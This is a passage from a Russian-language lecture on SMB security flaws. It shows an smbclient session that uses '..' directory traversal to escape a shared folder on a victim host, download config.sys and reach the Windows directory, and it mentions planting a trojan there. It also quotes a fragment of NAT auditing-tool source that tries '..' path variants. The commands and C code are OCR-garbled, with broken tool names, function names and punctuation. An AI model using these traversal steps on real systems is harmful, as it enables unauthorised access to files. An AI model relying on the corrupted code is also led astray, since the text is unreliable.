Лекция: Атаке, как указание клиенту передавать пароль в открытом виде, потому что

Сервер якобы не поддерживает зашифрованные пароли. Естественно, роль

Сервера здесь выполняет ложный сервер злоумышленника (см. главу 3).

Из-за поддержки устаревших с точки зрения безопасности сетевых решений SMB

Может быть подвержен атаке на получение доступа ко всему диску, если у

Злоумышленника есть права только на его часть (каталог). Для этого

взломщику достаточно указать имя каталога через ".." $snibclient

\\\\VICTIM\\SOME_DIR -n TRUSTME -m LANMAN2 -U HACKER -1 194.94.94.94

smb: \" dir suit): \" cd. .

smb: \. .\" dir

smb: \..\«cd \..\..

smb:\..\..\»dir

smb: \. .\. .\" get config.sys -

smb; \..\..\" cd windows

smb: \. .\. .\windows\"

Далее злоумышленник может поместить в системный каталог Windows, например,

«троянского» коня. Первоначальная реакция Microsoft: «Samba -это

неправильный клиент, и он не должен быть использован».

Аналогичные попытки делает и NAT (NetBIOS Auditing Tool) -

Распространенное средство анализа безопасности для Windows-сетей. Вот

фрагмент его исходного текста:

strcpy(cur_dir, "..\\*.*"):

Do_dir (inbuf, outbuf, cur_dir, fattr, cfflp_stash, False);

tested_stash = 0:

strcpy(cur_dir, "\\..\\*.*");

do_dir (inbuf, outbuf, cur_dir, fattr, cmp_stash, False):

tested_stash = 0;

strepy (cur_dir, "...\\*.*"),

Do_dir (inbuf, outbuf, cur_dir, fattr, cmp_stash, False);

tested_stash = 0;

strcpy (cur_dir, ".\\… .\\*. *");

еще рефераты
Еще работы по информатике